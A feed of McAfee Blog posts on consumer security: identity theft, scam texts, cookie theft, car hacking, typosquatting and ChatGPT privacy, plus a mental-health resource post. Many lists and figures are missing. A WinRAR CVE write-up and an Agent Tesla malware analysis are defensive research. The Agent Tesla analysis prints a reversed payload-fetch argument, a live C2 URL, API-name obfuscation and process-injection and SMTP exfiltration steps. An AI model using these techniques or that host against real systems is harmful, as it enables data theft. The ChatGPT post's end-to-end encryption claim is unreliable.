Let’s be honest, talking to your kids about identity theft isn’t probably top of your list. There’s a long list of topics to cover off when you are a parent. But if you take a minute to picture someone stealing your child’s identity or using their personal information to take out a loan for a shiny new car then you’ll probably want to move it closer to the top of your parenting to-do list!
What Is Identity Theft?
Identity theft occurs when a person’s personal identifying information is used without their permission, usually to commit fraud by making unauthorised purchases or transactions. Identity theft can happen in many ways, but its victims are usually left with significant damage to their finances, credit score, and even their mental health.
Most people associate identity theft with data breaches – think Optus, Latitude Financial and Medibank – however, there are many more ways that scammers can get their hands on your personal identifying details. They can use ‘phishing’ emails to get information from you, do a deep dive on your social media accounts to find identifying information in posts or photos, hack public Wi-Fi to access any information you share or simply, steal your wallet or go through your trash!!
How Big An Issue Is It Really?
In short, it’s a big problem – for both individuals and organisations. And here are the statistics:
How Do You Know If You’re a Victim?
One of the biggest issues with identity theft is that you often don’t immediately know that you’re a victim. In some cases, it might take weeks before you realise that something is awry which unfortunately, gives the thief a lot of time to wreak havoc! Some of the signs that something might be wrong include:
What To Do If You Think You’re a Victim
The key here is to act as soon as you believe you are affected. Don’t stress that there has been a delay in taking action – just take action now! Here’s what you need to do:
1. Call Your Bank
Your first call should be to your bank so they can block the affected account. The aim here is to prevent the scammer from taking any more money. Also remember to block any cards that are linked to this account, either credit or debit.
2. Change Your Passwords
If your identity has been stolen then it’s highly likely that the scammer knows your passwords so change the passwords for the affected accounts straight away!! And if you have used this same password on any other accounts then change these also. If you can’t remember, you can always reset the passwords on key accounts just to be safe.
3. Report It
It may feel like a waste of time reporting your identity theft, but it is an important step, particularly as your report becomes a formal record – evidence you may need down the track. It may also prevent others from becoming victims by helping authorities identify patterns and hopefully, perpetrators. If you think your personal identifying information has been used, report it to the Australian authorities at ReportCyber.
4. Make a Plan
It’s likely you’re feeling pretty overwhelmed at what to do next to limit the damage from your identity theft – and understandably so! Why not make a contract with IDCARE? It’s a free service dedicated to assisting victims of identity theft – both individuals and organisations – in Australia and New Zealand.
How Do We Talk To Our Kids About It?
If there is one thing I have learned in my 20+ years of parenting, it is this. If you want to get your kids ‘onboard’ with an idea or a plan, you need to take the time to explain the ‘why’. There is absolutely no point in asking or telling them to do something without such an explanation. It is also imperative that you don’t lecture them. And the final ingredient? Some compelling statistics or research – ideally with a diagram – my boys always respond well to a visual!
So, if you haven’t yet had the identity theft chat with your kids then I recommend not delaying it any further. And here’s how I’d approach it.
Firstly, ensure you are familiar with the issue. If you understand everything I’ve detailed above then you’re in good shape.
Secondly, arm yourself with relevant statistics. Check out the ones I have included above. Why not supplement this with a few relevant news stories that may resonate with them? This is your ‘why’.
Thirdly, focus on prevention. This needs to be the key focus. But don’t badger or lecture them. Perhaps tell them what you will be doing to minimise the risk – see below for your key ‘hot tips’ – you’re welcome!
What You Can Do To Manage Identity Theft?
There are a few key things that you can today that will both minimise your risk of becoming a victim and the consequences if you happen to be caught up in a large data breach.
1. Passwords
Managing passwords for your online accounts is one of the best risk management strategies for identity theft. I know it’s tedious, but I recommend creating a unique and complex 10+ digit password for each of your online accounts. Tricky passwords make it harder for someone to get access to your account. And, if you use the same log-in details for each of your online accounts – and your details are either leaked in a data breach or stolen – then you could be in a world of pain. So, take the time to get your passwords sorted out.
2. Think Before You Post
Sharing private information about your life on social media makes it much easier for a scammer to steal your identity. Pet names, holiday destination and even special dates can provide clues for passwords. So, lock your social media profiles down and ensure your privacy settings are on.
3. Be Proactive – Monitor Your Identity Online
Imagine how good it would be if you could be alerted when your personal identifying information was found on the Dark Web? Well, this is now a reality! McAfee’s latest security offering entitled McAfee+ will not only protect you against threats but provide 24/7 monitoring of your personal details so it can alert you if your information is found on the Dark Web. And if your details are found, then advice and help may also be provided to remedy the situation. How good!!
4. Using Public Computers and Wi-Fi With Caution
Ensuring you always log out of a shared computer is an essential way of keeping prying eyes away from your personal identifying information. And always be super careful with public Wi-Fi. I only use it if I am desperate and I never conduct any financial transactions, ever! Cybercriminals can ‘snoop’ on public Wi-Fi to see what’s being shared, they can stage ‘Man in The Middle Attacks’ where they eavesdrop on your activity, or they can lure you to use their trustworthy sounding Wi-Fi network – designed purely to extract your private information!
5. Monitor Your Bank Accounts
Why not make a habit of regularly checking your bank accounts? And if you find anything that doesn’t look right contact your bank immediately to clarify. It’s always best to know if there is a problem so you can address it right away.
With so many Aussies affected by data breaches and identity theft, it’s essential that our kids are armed with good information so they can protect themselves as best as possible. Why not use your next family dinner to workshop this issue with them?
Till Next Time
Stay Safe Online
Alex
The post How to Talk To Your Kids About Identity Theft appeared first on McAfee Blog.
The tables have turned. Now you can use AI to spot and block scam texts before they do you harm.
You might have heard how scammers have tapped into the power of AI. It provides them with powerful tools to create convincing-looking scams on a massive scale, which can flood your phone with annoying and malicious texts.
The good news is that we use AI too. And we have for some time to keep you safe. Now, we’ve put AI to use in another powerful way—to put an end to scam texts on your phone.
Our new McAfee Scam Protection automatically identifies and alerts you if it detects a dangerous URL in your texts. No more wondering if a package delivery message or bank notification is real or not. Our patented AI technology instantaneously detects malicious links to stop you before you click by sending an alert. And as a second line of defense, it can block risky sites if you accidentally follow a scam link in a text, email, social media, and more.
The time couldn’t be more right for this kind of protection. Last year, Americans lost $330 million to text scams alone, more than double the previous year, with an average reported loss of $1,000, according to the Federal Trade Commission. The deluge of these new sophisticated AI-generated scams is making it harder than ever to tell what’s real from what’s fake.
Which is where our use of AI comes in. With it, you can turn the table on scammers and their AI tools.
Here’s a closer look at how McAfee Scam Protection works:
McAfee Scam Protection is free for most existing customers, and free to try for new customers.
Most McAfee customers now have McAfee Scam Protection available. Simply update your app. There’s no need to purchase or download anything separately. Set up McAfee Scam Protection in your mobile app, then enable Safe Browsing for extra protection or download our web protection extension for your PC or Mac from the McAfee Protection Center. Some exclusions apply¹.
For new customers, McAfee Scam Protection is available as part of a free seven-day trial of McAfee Mobile Security. After the trial period, McAfee Mobile Security is $2.99 a month or $29.99 annually for a one-year subscription.
As part of our new Scam Protection, you can benefit from McAfee’s risky link identification on any platform you use. It can block dangerous links should you accidentally click on one, whether that’s through texts, emails, social media, or a browser. It’s powered by AI as well, and you’ll get it by setting up Safe Browsing on your iOS² or Android device—and by using the WebAdvisor extension on PCs, Macs and iOS.
Scan the QR code to download McAfee Scam Protection from the Google App store
AI works in your favor. Just as it has for some time now if you’ve used McAfee for your online protection. McAfee Scam Protection takes it to a new level. As scammers use AI to create increasingly sophisticated attacks, McAfee Scam Protection can help you tell what’s real and what’s fake.
The post Get Yourself AI-powered Scam Protection That Spots and Block Scams in Real Time appeared first on McAfee Blog.
Authored by Neil Tyagi
On 23 August 2023, NIST disclosed a critical RCE vulnerability CVE-2023-38831. It is related to an RCE vulnerability in WinRAR before version 6.23. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the harmless file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file.
Our intelligence shows that this vulnerability is being exploited as early as April 2023. Let’s look at a sample exploiting this vulnerability (Hash: bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa)
Global Heatmap where this vulnerability is being seen in the wild(based on McAfee telemetry data)
Infection chain
How does the vulnerability work?
Normal.zip
Weaponized.zip
Normal Zip
Weaponized Zip
Normal zip
Weaponized zip
IOC’s
Sha256 | Detection |
bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa | Trojan:Archive/2023_38831.NEAA
|
%APPDATA%\Nvidia\Core.ocx
Recommendations
The post Exploring Winrar Vulnerability (CVE-2023-38831) appeared first on McAfee Blog.
I’m such a fan of RUOK? Day. Started in 2009, it’s an Australian non-profit suicide prevention that is all about having conversations with others to address social isolation and promote a sense of community. What I love the most, is that RUOK? Day has become quite an event on the Australian calendar. You’d be hard-pressed to find a workplace that doesn’t host a morning tea or a retailer that’s not selling a ribbon or badge in support of the day. In my opinion, it has given many of us the confidence to talk about mental health and that, my friends, is a very good thing!
You wouldn’t be human if you hadn’t ever felt a little down or anxious. It’s the natural ebb and flow of daily life. However, if these symptoms are hanging around and are affecting your ability to ‘do’ life then, it’s time to take some action.
Remember, it is incredibly common for someone to experience a dip in their mental health. Recent research shows that over 2 in 5 Aussies aged 16 to 85 will experience a mental disorder at some time in their life, with 1 in 5, experiencing a mental disorder in the previous 12 months.
If you’re not feeling OK, the most important thing to remember is that you do not need to deal with this all by yourself. Sometimes when you’re feeling really low, the thought of leaving the house and facing the world can feel too much. I totally get it! And that’s where the online world can play a huge role. There is an abundance of resources available online for anyone who needs mental health support which makes it so much easier to get the help you need when facing the world just feel a bit much.
Here is a list of organisations that offer online mental health services here in Australia. This list is not exhaustive however these are the most commonly used, and hence best funded, support services. If you are based in the US, please find details at the end of the post for organisations that can provide mental health support.
So, if you are not just yourself at the moment and are feeling really low – or you know someone that is – please know that there is help available online 24/7. So, make yourself a cuppa and get started because you are not alone.
Alex xx
P.S. For my US friends:
The 988 Suicide & Crisis Helpline provides 24/7 free and confidential support and crisis resources for people in distress, and their families. Simply text or call 988 to access help.
The Crisis Text Line is a free and confidential 24/7 support service for anyone who resides in the US. Support can be accessed by text message (text HOME to 741-741) and online chat.
The post RUOK Day – How to Get Help Online When You’re Not Feeling OK appeared first on McAfee Blog.
Chocolate chip, oatmeal raisin, snickerdoodle: Cybercriminals have a sweet tooth just like you. But their favorite type of cookie is of the browser variety.
Browser cookies – often just referred to as cookies – track your comings and goings on websites. And when a cyber thief gets their mitts on your browser cookies, it can open all kinds of doors into your online accounts.
The first step to protecting your devices and online privacy from criminals is to understand their schemes. Here are the key terms you need to know about cookie theft plus how to keep malicious software off your devices.
Cookie theft can happen to anyone. Knowing the basics of this cyberscheme may help you better protect your online life:
Cookies thieves are generally motivated by the financial gains of breaking into people’s online accounts. Banking, social media, and online shopping accounts are full of valuable personal and financial details that a cybercriminal can either sell on the dark web or use to impersonate you and steal your identity.
Malware is generally the vehicle cybercriminals use to steal cookies. Once the malicious software gets onto a device, the malware is trained to copy a new cookie’s data and send it to the cybercriminal. Then, from their own machine, the cybercriminal can input that data and start a new session with the target’s stolen data.
There was a stretch of a few years where cookie thieves targeted high-profile YouTube influencers with malware spread through fake collaboration deals and crypto scams. The criminals’ goal was to steal cookies to sneak into the backend of the YouTube accounts to change passwords, recovery emails and phone numbers, and bypass two-factor authentication to lock the influencers out of their accounts.1
But you don’t have to have a valuable social media account to draw the eye of a cybercriminal. “Operation Cookie Monster” dismantled an online forum that sold stolen login information for millions of online accounts gained through cookie theft.2
To keep your internet cookies out of the hands of criminals, it’s essential to practice safe browsing habits. These four tips will go a long way toward keeping your accounts out of the reach of cookie thieves and your devices free from malicious software.
McAfee+ is an excellent partner to help you secure your devices and digital life. McAfee+ includes a safe browsing tool to alert you to suspicious websites, a password manager, identity monitoring, and more.
The next time you enjoy a cookie, spare a moment to think of cookies of the digital flavor: clear your cache if you haven’t in awhile, doublecheck your devices and online accounts for suspicious activity, and savor the sweetness of your digital privacy!
1The Hacker News, “Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts”
2CNN, “‘Operation Cookie Monster:’ FBI seizes popular cybercrime forum used for large-scale identity theft”
The post How to Keep Cybercriminals Out of Your Accounts appeared first on McAfee Blog.
In the modern era, technology has become an integral part of our daily lives. Our cars are no longer just pieces of mechanical engineering but have evolved into highly advanced machines equipped with state-of-the-art computer systems. From engine performance to preventive maintenance and from passenger comfort to safety assistance, the computer software in our cars control a vast array of operations.
However, just like any other technological device, car computer systems aren’t immune to cyber threats. Cybersecurity attacks on cars can pose serious safety threats and privacy issues, with hackers potentially taking control of vehicle functions or stealing personal data. This brings us to an essential question – how secure is your car’s computer software?
There are several possible instances where a cyber attack could take place. For example, software vulnerabilities could allow hackers to access the car’s system and manipulate its operations. Additionally, insecure network interfaces can be exploited to introduce malicious code or extract sensitive information. Thus, understanding where these vulnerabilities lie is the first step towards enhancing your car’s computer software security.
With the rise of the Internet of Things (IoT), our cars are becoming more connected than ever before. Modern vehicles have built-in Wi-Fi and Bluetooth, GPS navigation systems, and even mobile applications allowing us to interact remotely with our cars. While these features enhance convenience and improve driving experiences, they also introduce new vulnerabilities that cybercriminals can exploit.
Just as your smartphone or computer can be attacked by malware or hackers, so can your car’s computer system. Sophisticated cybercriminals can potentially breach the car’s software to manipulate vehicle functions, steal personal data, or even take complete control of the vehicle. The threat is even greater with autonomous or semi-autonomous vehicles that rely heavily on software systems.
Car hacking may seem like a concept straight out of a science fiction movie, but it’s a harsh reality in today’s technologically advanced world. Various demonstrations by security researchers have proven the vulnerability of car computer systems. In some cases, hackers could remotely kill a car’s engine, disable brakes, or take control of steering — all of these while the car was in motion.
The risk doesn’t stop at vehicle control. Many car owners sync their smartphones with their car systems, allowing access to personal data such as contacts, messages, or even GPS history. A successful breach could give hackers access to this sensitive information, resulting in privacy issues or identity theft.
Car manufacturers play a crucial role in ensuring the cybersecurity of their vehicles. They are responsible for designing and implementing security measures right from the initial stages of vehicle design. This includes adopting secure coding practices, conducting regular vulnerability assessments and penetration testing, and providing regular software updates to address any identified security flaws.
At McAfee, we are actively collaborating with various car manufacturers to help identify potential weak points in their vehicle computer systems. By proactively addressing these vulnerabilities before they can be exploited, we aim to better safeguard our customers’ vehicles against potential cyber threats.
Just like your smartphone or computer, the software in your car needs regular updates. These updates not only provide new features and enhancements but also patch security vulnerabilities that hackers could exploit. Ignoring these updates can leave your car’s computer system open to potential cyber-attacks.
Ensuring your vehicle’s software is up-to-date is always a good practice. Most modern cars will notify you when a software update is available, or you can check with your car manufacturer or dealership. While it may seem like a hassle, updating your car’s software can go a long way in keeping it secure.
While car manufacturers are responsible for creating secure systems, users also share the responsibility for maintaining the security of their vehicle’s computer software. Keeping up-to-date with the fast-paced progress in cybersecurity can help in preventing possible threats.
Just as defensive driving helps you anticipate potential hazards on the road, adopting a defensive mindset towards your car’s computer software can help protect it against potential cyber threats. Familiarize yourself with your car’s digital features and understand what each does. Engage with these systems conscientiously and avoid reckless behavior, such as downloading suspicious apps or clicking on suspicious links that may appear on your car’s infotainment system.
You should also consider using a strong, unique password for any connected apps or services you use with your car. Many hacking attempts are made possible because users re-use passwords across multiple services, making it easier for cybercriminals to gain unauthorized access.
While it may seem odd to think of installing antivirus software or a firewall in your car, these traditional computer protection methods could soon become standard practice in vehicle cybersecurity. Just like how these tools protect your computer or smartphone, they can also safeguard your car’s computer system by detecting and blocking potential threats.
Some car manufacturers and cybersecurity companies are already exploring the development of such protective tools specifically for cars. Until these become widely available, you can reduce risk by being cautious about what devices you connect to your car and what data you share through its systems.
The future of car software security is evolving with the advancement in technology. Car manufacturers and cybersecurity companies continually work together to create robust security systems and innovate techniques to prevent potential threats.
Autonomous vehicles, or self-driving cars, represent the next frontier in vehicle technology. They rely heavily on software systems to function, making them prime targets for potential cyberattacks. However, they also present a unique opportunity to develop more advanced security measures.
Several autonomous vehicle manufacturers are at the forefront of cybersecurity innovation, integrating robust security measures into their cars’ software right from the design phase. These include advanced encryption methods, intrusion detection systems, and even artificial intelligence that can learn and adapt to new threats. While these solutions aren’t foolproof, they represent important steps towards a more secure future for autonomous vehicles.
As cars become more connected, regulatory authorities worldwide are beginning to note the associated security risks. New laws and regulations are being developed to ensure car manufacturers take cybersecurity seriously and have measures in place to safeguard their customers’ data and safety.
For example, the National Highway Traffic Safety Administration (NHTSA) has released cybersecurity best practices for modern vehicles in the United States. Such guidelines aim to standardize security measures across the auto industry and ensure all manufacturers are committed to protecting their customers’ security.
Advancements in car computer software have transformed our driving experiences, offering increased convenience and performance. However, with these benefits come new cybersecurity challenges. As cars become more connected and autonomous, the threat landscape expands, highlighting the urgent need for robust vehicle cybersecurity measures.
Securing your car’s computer software requires awareness, proactive behavior, and the adoption of new security technology. Car manufacturers, security experts, and regulatory authorities all have a role to play in this evolving field. However, as an individual, staying informed about potential risks and remaining vigilant in your usage of digital car features is a crucial first step towards protecting your car and your data from cyber threats.
Remember, security is a continuous journey, not a destination. As such, we at McAfee are committed to staying ahead of the curve and providing you with the information, tools, and assistance you need to navigate the world of car computer software security safely and confidently.
The post How Secure is Your Car’s Computer? appeared first on McAfee Blog.
In our digital world, scamming techniques have become more sophisticated, leading to a growing threat not only to individuals but also to businesses and organizations. One such scam is typosquatting. This deceitful practice takes advantage of internet users who inadvertently type incorrect website addresses into their web browsers. The outcome of this seemingly innocent mistake can range from irritating spam to substantial financial loss, and, in some cases, serious security breaches.
Typosquatting, Cybersquatting, URL Hijacking, or Domain Mimicking, whatever you may call it, is not a new threat. It has been around since the mid-’90s, but it has evolved over the years. In this article, we will dive deep into how these scams work, their implications, and ways to stay protected. But before moving into the specifics, it’s crucial to have a clear understanding of what Typosquatting is.
At its core, Typosquatting is a cyber scam that leverages the probability of errors made by internet users while typing a website address into their browser. The scam involves the creation of fake website domains that closely resemble legitimate ones but usually include common typing errors, misspellings, or the use of different top-level domains (like .com instead of .org).
When users accidentally land on these deceitfully created websites, they may be subjected to a range of fraudulent activities, including phishing attacks, forced downloads of malicious software, and advertisements that generate pay-per-click revenue for the scammer. The fake websites can also impersonate the real ones, tricking users into providing sensitive information such as login credentials or credit card information.
It is critical to understand that Typosquatting is a game of chance for scammers. They capitalize on the likelihood that a certain percentage of online traffic will mistype URLs when browsing. By registering domains that are just a single character off from popular URLs, or by using commonly mistyped versions of web addresses, scammers can set up fake websites to ensnare unsuspecting internet users.
For instance, if a user meant to visit ‘example.com’ but instead typed ‘exmaple.com’, they could potentially land on a typosquatting site. The scammer’s goal is to benefit from this mistake in some way. This could involve displaying advertisements to earn click-through revenue, selling products or services, or attempting to collect personal information through phishing techniques.
→ Dig Deeper: 8 Ways to Know If Online Stores Are Safe and Legit
Typosquatting scams can take on various forms, each with its unique approach but with the same malicious intent – to deceive and exploit internet users. Let’s look at some of the common variations.
Understanding the implications of typosquatting scams can highlight why it’s crucial to stay vigilant when entering website URLs. The impact of these scams can be significant, particularly if the user unknowingly shares sensitive data. The scams can also cause harm to the reputation of legitimate businesses, leading to customer mistrust and potential loss of business.
→ Dig Deeper: Invisible Adware: Unveiling Ad Fraud Targeting Android Users
Staying safe from typosquatting scams requires a combination of awareness and the use of protective measures. Here are some steps you can take:
The world of cybercrime is full of evolving threats, and typosquatting scams are among the most deceitful. These scams capitalize on simple human errors to cause significant harm, including personal data theft and installation of malicious software. Nonetheless, by maintaining a high level of alertness, double-checking URLs, using security software, and staying informed about such threats, internet users can protect themselves from falling victim to these scams. Remember, a moment’s delay to double-check can save a load of potential trouble down the line.
The post How Typosquatting Scams Work appeared first on McAfee Blog.
Authored by Yashvi Shah
Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.
Generally, Agent Tesla uses deceptive emails to infect victims, disguising as business inquiries or shipment updates. Opening attachments triggers malware installation, concealed through obfuscation. The malware then communicates with a command server to extract compromised data.
The following heat map shows the current prevalence of Agent Tesla on field:
Figure 1: Agent Tesla heat map
McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.
The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.
Figure 2: Infection Chain
VBS needs scripting hosts like wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS is executed, wscript invokes the initial PowerShell command.
Figure 3: Process Tree
The first PowerShell command is encoded as illustrated here:
Figure 4: Encoded First PowerShell
Obfuscating PowerShell commands serves as a defense mechanism employed by malware authors to make their malicious intentions harder to detect. This technique involves intentionally obfuscating the code by using various tricks, such as encoding, replacing characters, or using convoluted syntax. This runtime decoding is done to hide the true nature of the command from static analysis tools that examine the code without execution. Upon decoding, achieved by substituting occurrences of ‘#@$#’ with ‘A’ and subsequently applying base64-decoding, we successfully retrieved the decrypted PowerShell content as follows:
Figure 5: Decoded content
The deciphered content serves as the parameter passed to the second instance of PowerShell..
Figure 6: Second PowerShell command
Deconstructing this command line for clearer comprehension:
Figure 7: Disassembled command
As observed, the PowerShell command instructs the download of an image, from the URL that is stored in variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:
Figure 8: Downloaded image
This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable ‘base64Length’. The data enclosed between these markers is stored in ‘base64Command’. The subsequent images illustrate these markers and the content encapsulated between them.
Figure 9: Steganography
After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.
Figure 10: DLL obtained from steganography
This DLL serves two purposes:
Figure 11: DLL loaded
In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:
$arguments = ,(‘txt.46ezabwenrtsac/42.021.871.591//:ptth’)
The instruction mandates reversing the content of this parameter and subsequently storing the outcome in the variable named ‘address.’ Upon reversing the argument, it transforms into:
http://195.178.120.24 /castrnewbaze64.txt
Figure 12: Request for payload
Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.
Figure 13: Downloaded text file
In Figure 11, at marker 2, the contents of the “text” variable are reversed and overwritten in the same variable. Subsequently, at marker 3, the data stored in the “text” variable and is subjected to base64 decoding. Following this, we determined that the file is a .NET compiled executable.
Figure 14: Final payload
In Figure 11, another activity is evident at marker 3, where the process path for the upcoming process injection is specified. The designated process path for the process injection is:
“C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe”.
Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.
Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:
Figure 15: Process Injection
By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function ‘hU0H4qUiSpCA13feW0’ is used for replacing content. For example,
“kern!”.Replace(“!”, “el32”) à kernel32
Class1.hU0H4qUiSpCA13feW0(“qllocEx”, “q”, “VirtualA”) à VirtualAllocEx
As a result, these functions translate into the subsequent API calls:
Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.
The ultimate executable is heavily obfuscated. It employs an extensive array of switch cases and superfluous code, strategically intended to mislead researchers and complicate analysis. Many of the functions utilize either switch cases or their equivalent constructs, to defend detection. The following snippet of code depicts this:
Figure 16: Obfuscation
Fingerprinting:
Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:
Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.
Figure 17: Opera browser
Figure 18: Yandex browser
Figure 19: Iridium browser
Figure 20: Chromium browser
Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:
Figure 21: User data retrieval from all browsers -1
Figure 22: User data retrieval from all browsers – 2
Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:
Figure 23: Mail clients
Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.
The observed sample utilizes SMTP as its chosen method of exfiltration. This protocol is frequently favored due to its minimal overhead demands on the attacker. SMTP reduces overhead for attackers because it is efficient, widely allowed in networks, uses existing infrastructure, causes minimal anomalies, leverages compromised accounts, and appears less suspicious compared to other protocols. A single compromised email account can be used for exfiltration, streamlining the process, and minimizing the need for complex setups. They can achieve their malicious goals with just a single email account, simplifying their operations.
Figure 24: Function calls made for exfiltration.
This is the procedure by which functions are invoked to facilitate data extraction via SMTP:
Figure 25: Port number
Figure 26: Domain retrieval
Figure 27: Email address used
Figure 28: Password
The SMTP process as outlined involves a series of systematic steps. It begins with the processing of a specific parameter value, which subsequently determines the port number for SMTP communication. Following this, the malware retrieves the associated domain of the intended email address, revealing the address itself and ultimately providing the corresponding password. This orchestrated sequence highlights how the malware establishes a connection through SMTP, facilitating its intended operations.
Following these steps, the malware efficiently establishes a login using acquired credentials. Once authenticated, it commences the process of transmitting the harvested data to a designated email address associated with the malware itself.
The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.
File | MD5 | SHA256 |
VBS file | e2a4a40fe8c8823ed5a73cdc9a8fa9b9 | e7a157ba1819d7af9a5f66aa9e161cce68d20792d117a90332ff797cbbd8aaa5 |
JPEG file | ec8dfde2126a937a65454323418e28da | 21c5d3ef06d8cff43816a10a37ba1804a764b7b31fe1eb3b82c144515297875f |
DLL file | b257f83495996b9a79d174d60dc02caa | b2d667caa6f3deec506e27a5f40971cb344b6edcfe6182002f1e91ce9167327f |
Final payload | dd94daef4081f63cf4751c3689045213 | abe5c5bb02865ac405e08438642fcd0d38abd949a18341fc79d2e8715f0f6e42 |
Table 1:Indicators of Compromise
The post Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion appeared first on McAfee Blog.
Love it or hate it, generative artificial intelligence (AI) and ChatGPT in particular have become one of the most talked about tech developments of 2023. Many of us have embraced it with open arms and have put it to work by tasking it to ‘assist’ with assignments, write copy for an ad, or even pen a love letter – yes, it’s a thing. Personally, I have a love/hate relationship with it. As someone who writes for a living, it does ‘grind my gears’ but I am a big fan of its ability to create recipes with whatever I can find in my fridge. But like any new toy, if you don’t use it correctly then there could be issues – which may include your privacy.
ChatGPT is an online software program developed by OpenAI that uses a new form of artificial intelligence – generative AI – to provide conversational, human-style responses to a broad array of requests. Think of it as Google on steroids. It can solve maths questions, translate copy, write jokes, develop a resume, write code, or even help you prepare for a job interview. If you want to know more, check out my Parent’s Guide to ChatGPT.
But for ChatGPT to answer tricky questions and be so impressive, it needs a source for its ‘high IQ’. So, it relies on knowledge databases, open data sources and feedback from users. It also uses social media to gather information and a practice known as ‘web scraping’ to gather data from a multitude of sources online. And it is this super powerful combination that allows ChatGPT to ‘almost always’ deliver on tasks.
Your privacy can be affected in several ways. While I discuss some specifics on ChatGPT, similar concerns apply to other generative AI programs. Some of these ways may not concern you, but I’m quite sure some will. Here’s what you need to know:
When ChatGPT (along with many similar tools) absorbed the enormous amount of data it needed to function from sources like books, articles, and web pages, they did so without seeking case-by-case permission. As certain data can be used to identify us, our friends and family or even our location, this can present privacy concerns. Some authors have already filed complaints for usage of their content without compensation, despite ChatGPT offering users a premium package for US$20/month. Recently, many online news outlets have blocked OpenAI’s crawler which will limit ChatGPT’s ability to access their news content.
Every time you share a piece of information with ChatGPT, you are adding to its data bank, risking that the information ends up somewhere in the public domain. The Australian Medical Association (AMA) recently issued a mandate for Western Australian doctors not to use ChatGPT after doctors at a Perth hospital used it to write patient notes. These confidential patient notes could be used to not only further train ChatGPT but could theoretically also be included in responses to other users.
In addition to collecting the information users share, it also collects detailed information about its users. In the company’s privacy policy, it outlines that it collects users’ IP addresses and browser types. It also collects information on the behaviour of its users e.g. the type of content that users engage with as well as the features they use. It also says that it may share users’ personal information with unspecified parties, without informing them, to meet their business operation needs.
One of the biggest risks to using ChatGPT and similar generative AI is the risk that your details will be leaked in a data breach. Between 100,000 ChatGPT accounts credentials were compromised and sold on the Dark Web in a large data beach which happened between June 2022 to May 2023, according to Search Engine Journal.
But here’s another potential problem – as ChatGPT users can store conversations, if a hacker gains access to an account, it may mean they also gain access into propriety information, sensitive business information or even confidential personal information.
Now please don’t misunderstand me, ChatGPT is taking action to protect users but it may not be enough to truly protect your privacy.
ChatGPT does make it very clear that all conversations between a user and ChatGPT are protected by end-to-end encryption. It also outlines that strict access controls are in place so only authorised personnel can access sensitive user data. It also runs a Bug Bounty program which rewards ethical hackers for finding security vulnerabilities. However, in order to remain protected while using the app, I believe the onus is on the user to take additional steps to protect their own privacy.
As we all know, nothing is guaranteed in life however there are steps you can take to minimise the risk of your privacy being compromised. Here are my top tips:
Never share personal or sensitive information in any of your prompts. By doing so, you increase the risk of sharing confidential data with cybercriminals. If you need a sensitive piece of writing edited, ask a friend!!
